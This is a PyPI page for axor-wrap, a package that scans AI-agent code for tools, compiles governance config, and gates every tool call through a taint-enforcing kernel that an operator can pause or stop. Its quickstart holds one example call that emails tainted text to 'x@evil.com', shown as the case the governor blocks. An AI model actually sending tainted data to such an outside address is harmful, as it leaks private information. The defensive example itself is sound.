Wrap engine for the Axor ecosystem: scan agent code, emit tool manifests, compile governance, wrap the runtime
Project description
axor-wrap
Wrap engine for the Axor ecosystem: point it at agent code, get tool manifests, governance config, and a kernel-gated runtime.
Takes an agent codebase (plain Python / LangChain / MCP), statically finds its tools, and emits:
- tool-manifests —
tool-manifest/v1files, the runnable contract axor-lab benchmarks against; - governance config — a
GovernanceConfig-loadable YAML andToolCallGovernorkwargs, using the same manifest→config compilation semantics as axor-lab; - a wrapped runtime — every tool call goes
evaluate → deny? → call → register_outputthrough the real axor-core kernel; - a live governed node —
axor_wrap.planespeaks the Control-Plane protocol (v0.2), so the wrapped agent can attach to a plane and be paused/stopped by an operator.
Core is stdlib-only, zero dependencies. axor-core is an optional extra.
Why one wrap serves both products
The Axor ecosystem has two consumers of the same wrapped runtime:
- Control Plane speaks the plane protocol: a node enrolls, receives its admitted config, and enforces per-call with
ToolCallGovernor— the 9-gate, per-value taint engine. - Lab speaks the runtime-jobs protocol (Lab assigns, the runtime executes): the runtime registers once, pulls experiment assignments, runs trials locally under the same governor, and pushes back kernel events + traces.
Both consume the same two artifacts this package produces: tool manifests (what the tools are, what they can affect) and the compiled governor config (which tools are egress sinks, which are untrusted sources, which arguments drive the gate). Wrap once — connect to either.
agent code ──scan──► DetectedTool ──infer──► EffectGuess ──build──► tool-manifest/v1
│
┌─────────────────────────┤
▼ ▼
governor kwargs / WrappedToolset
governance YAML (axor-core gate)
│ │
Control Plane ◄── one runtime ──► Lab
Where the plane lives, and why
The Control-Plane primitives are here, in axor_wrap.plane, not in axor-core:
| lives in | what it is | |
|---|---|---|
DesiredState, Injection, Excision, excision_refused_refs |
axor-core (kernel.state) |
the lattice and provenance guard the kernel folds — enforcement reasons over these whether or not a plane exists |
canonicalize (JCS/RFC 8785), kernel.events, contracts.trace |
axor-core | the canonical bytes commands are signed over, and the schemas telemetry speaks |
AdmissionController |
axor-core (contracts.admission) |
a pure contract, no imports — the seam IntentLoop/GovernedSession steer through |
PlaneSession, PlaneClient, PlaneAdmission, trace_to_kernel |
axor-wrap (axor_wrap.plane) |
protocol-v0.2 session semantics, the outbound transport, the admission implementation, the trace→event projection |
The split exists to make one guarantee structural instead of conventional: enforcement is local and in-process, and the plane is an advisory overlay that can only narrow (spec 12.0). A kernel that cannot import a plane client cannot grow a dependency on one — so "the plane is not in the decision path" becomes a packaging fact, and axor-core keeps zero required dependencies and no network surface at all.
Install
pip install axor-wrap # scanner + compiler, stdlib-only
pip install 'axor-wrap[kernel]' # + axor-core, for the wrapped runtime
pip install 'axor-wrap[plane]' # + httpx/cryptography, to attach as a live Control-Plane node
Quickstart
# 1. scan — what tools does this agent have, and what do they probably do?
axor-wrap scan ./my_agent
# TOOL FRAMEWORK EFFECT CONF SCHEMA SOURCE
# search_web langchain READ high high agent.py:7 langchain:@tool
# send_email langchain EXPORT high high agent.py:14 langchain:@tool
# shell implicit EXEC high low runner.py:9 implicit:subprocess.run
# 2. manifest — one tool-manifest/v1 per tool + wrap.json sidecar
axor-wrap manifest ./my_agent -o manifests/
# 3. config — GovernanceConfig-compatible YAML
axor-wrap config manifests/ > governance.yaml
# 4. connect to a Lab server (runtime-jobs protocol)
axor-wrap connect-lab --base-url http://127.0.0.1:8321 --model claude-fable-5
Exit codes: 0 ok, 2 nothing found / bad input.
Wrapped runtime
from axor_wrap import WrappedToolset, ToolDenied, scan_project, infer_effect, build_manifest
tools = {"search_web": search_web, "send_email": send_email}
detected = scan_project(Path("./my_agent"))
manifests = [build_manifest(t, infer_effect(t)) for t in detected]
toolset = WrappedToolset(tools, manifests) # needs axor-wrap[kernel]
try:
toolset.call("send_email", {"to": "x@evil.com", "body": tainted_text})
except ToolDenied as denial:
print(denial.category, denial.reason) # e.g. taint_enforcement: ...
# or, for frameworks that own their loop (LangChain executors, MCP servers):
from axor_wrap import wrap_callables
governed = wrap_callables(tools, manifests) # drop-in callables, one shared session
What the scanner detects
| Pattern | Framework tag |
|---|---|
@tool (any alias from langchain_core.tools / langchain.tools) |
langchain |
StructuredTool.from_function(...) |
langchain |
Tool(name=..., func=...) |
langchain |
@mcp.tool() / @server.tool() (incl. x = FastMCP(...) bindings) |
mcp |
dict literals with {name, description, input_schema} |
anthropic |
subprocess.run/Popen/..., os.system → implicit shell candidate |
implicit |
Argument schemas are inferred from type hints (str→string, int→integer, float→number, bool→boolean; default present → optional). Honesty rule: anything not inferable stays a bare {"type": "object"} with schema_confidence: "low" — the scanner never invents types.
Manifest format
The embedded schema axor_wrap/schemas/tool-manifest.schema.json is a verbatim copy of axor-lab/contracts/schemas/tool-manifest.schema.json — the axor-lab contracts are the source of truth; this copy only removes the cross-repo import. validate_manifest checks against it with a minimal own subset validator (same approach as axor-lab's lab_contracts/subset_validator.py; no jsonschema dependency).
Compilation semantics match axor-lab's compiled_governor_config: effect class EXPORT/EXEC (default or any resolve rule) → egress_sinks; declared untrusted_fields → untrusted_sources; effect.driving_args → driving_args; a policy allowlist → an enum value_policy on each sink's first driving arg.
Status: what's real / not yet
Real today
- static detection of the 6 patterns above, with signature→schema inference;
- valid
tool-manifest/v1output + embedded-schema validation; - governor-config compilation with axor-lab's exact mapping semantics;
WrappedToolset/wrap_callablesdriving the realToolCallGovernor(extrakernel);LabRuntimeConnector— the full runtime-jobs handshake (connect / poll / claim / events / complete), tested against a protocol stub.PlaneConnector— a live governed node on the Control Plane (extraplane), built on this package's ownaxor_wrap.planeprimitives (PlaneSession/PlaneClient): it registers, heartbeats (Control's topology shows the node with a level that mirrors its posture —NORMAL/CAUTIOUS/RESTRICTED), and subscribes to desired state over SSE, so an operator's pause / stop / budget-cap is applied to the node by real plane code.PlaneConnector.gate(toolset)binds that posture to a wrapped runtime, so a pause/stop actually holds real tool execution (AdmissionHeld), not just a session flag. Tested against a stdlib SSE plane-backend stub that pushes a real{paused: true}delta.PlaneConnector.post_health_check(payload)— the out-dial half of the behavioral health check. A node that runs an axor-probe battery posts the finished verdict to the plane, which renders it on its Health panel. The payload isaxor_probe.integration.plane.health_payload(report); the dict is the whole contract, so axor-wrap never imports axor-probe and a node that does not probe simply never calls this. Batteries are the node's to run: the plane has no inbound path into a runtime, and a health check is not an exception.
from axor_wrap import PlaneConnector, WrappedToolset
toolset = WrappedToolset(tools, manifests) # axor-wrap[kernel]
node = PlaneConnector("https://plane.example", "node-1", # axor-wrap[plane]
operator_keys={"ops": "<ed25519-hex>"})
node.connect()
node.gate(toolset) # paused/stopped node → toolset.call raises AdmissionHeld
await node.run(ttl=180) # heartbeat + desired-state loop until stop()/ttl
# and, if this node also probes itself for behavioral drift:
from axor_probe.integration.plane import health_payload # axor-probe, optional
report = await pipeline.run(event)
if report is not None:
await node.post_health_check(health_payload(report))
Not yet / honest limits
- Full IntentLoop-admission on live load:
PlaneConnectorconnects and gates tool calls at the intent boundary, but the deeper axor-core path — an operator injection / excision / replan winding a runningIntentLoopdown viaGovernedSession(executor=Invokable, admission=PlaneAdmission(session))— needs the framework to hand axor-core anInvokableagent brain. The wrap model gates tools while the framework owns the invocation loop, so it exposes the posture gate (admit) rather than owning anIntentLoop. Adopting the full path is a per-framework integration, not a change to this connector. - Role inference is a heuristic with
UNKNOWNas a first-class outcome; final classification is a human decision in the config builder. In the manifest anUNKNOWNcompiles fail-closed toEXEC(the tool lands inegress_sinksuntil reviewed); the raw guess + confidence + reason survive inwrap.json. - The detector covers the 6 patterns listed — dynamically registered tools (loops building
Tool(...)from data, decorators re-exported through helper modules, tools defined in non-Python config) are out of static reach and will not be found. effect.resolverules,result_schema,sensitive_fields, simulation/reset strategies are not auto-generated — the manifest is a reviewed starting point, not a finished contract.
Development
uv run --extra dev --extra plane pytest -q # the whole suite
python -m unittest discover -s tests -t . # the stdlib-only half, no axor-core needed
ruff check .
axor_wrap.plane's tests came over from axor-core verbatim (they pin protocol-v0.2
governance invariants, so they were moved rather than rewritten) and are pytest-native;
everything else is stdlib unittest, which pytest collects too.
License: Apache-2.0.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file axor_wrap-0.1.0.tar.gz.
File metadata
- Download URL: axor_wrap-0.1.0.tar.gz
- Upload date:
- Size: 80.3 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.14
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
f851ce3d7833d0e52b2caf5f20d9ec4918f3333ae9ebb93896ebd5197fe49daa
|
|
| MD5 |
caed55806ea51f6f52c2984d89b4cfdb
|
|
| BLAKE2b-256 |
f014645a3542a1794ee7570886b1cf2c4bcc67769b0e9625d576ce4a11f9a369
|
Provenance
The following attestation bundles were made for axor_wrap-0.1.0.tar.gz:
Publisher:
ci.yml on Bucha11/axor-wrap
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
axor_wrap-0.1.0.tar.gz -
Subject digest:
f851ce3d7833d0e52b2caf5f20d9ec4918f3333ae9ebb93896ebd5197fe49daa - Sigstore transparency entry: 2258717544
- Sigstore integration time:
-
Permalink:
Bucha11/axor-wrap@79daa18f34e97691d7a95a1ebc852159de144e64 -
Branch / Tag:
refs/tags/v0.1.0 - Owner: https://github.com/Bucha11
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
ci.yml@79daa18f34e97691d7a95a1ebc852159de144e64 -
Trigger Event:
push
-
Statement type:
File details
Details for the file axor_wrap-0.1.0-py3-none-any.whl.
File metadata
- Download URL: axor_wrap-0.1.0-py3-none-any.whl
- Upload date:
- Size: 48.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.14
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
fa6861482444af899ff4c822cabb8154beef7c17633fb8391412719b6165571f
|
|
| MD5 |
37d6450f441c6c87013315f8cc6b53db
|
|
| BLAKE2b-256 |
55c1a7ec3e4b797b3e381443745e29d54c5fea7d30661e390252d179d25dc86a
|
Provenance
The following attestation bundles were made for axor_wrap-0.1.0-py3-none-any.whl:
Publisher:
ci.yml on Bucha11/axor-wrap
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
axor_wrap-0.1.0-py3-none-any.whl -
Subject digest:
fa6861482444af899ff4c822cabb8154beef7c17633fb8391412719b6165571f - Sigstore transparency entry: 2258717579
- Sigstore integration time:
-
Permalink:
Bucha11/axor-wrap@79daa18f34e97691d7a95a1ebc852159de144e64 -
Branch / Tag:
refs/tags/v0.1.0 - Owner: https://github.com/Bucha11
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
ci.yml@79daa18f34e97691d7a95a1ebc852159de144e64 -
Trigger Event:
push
-
Statement type: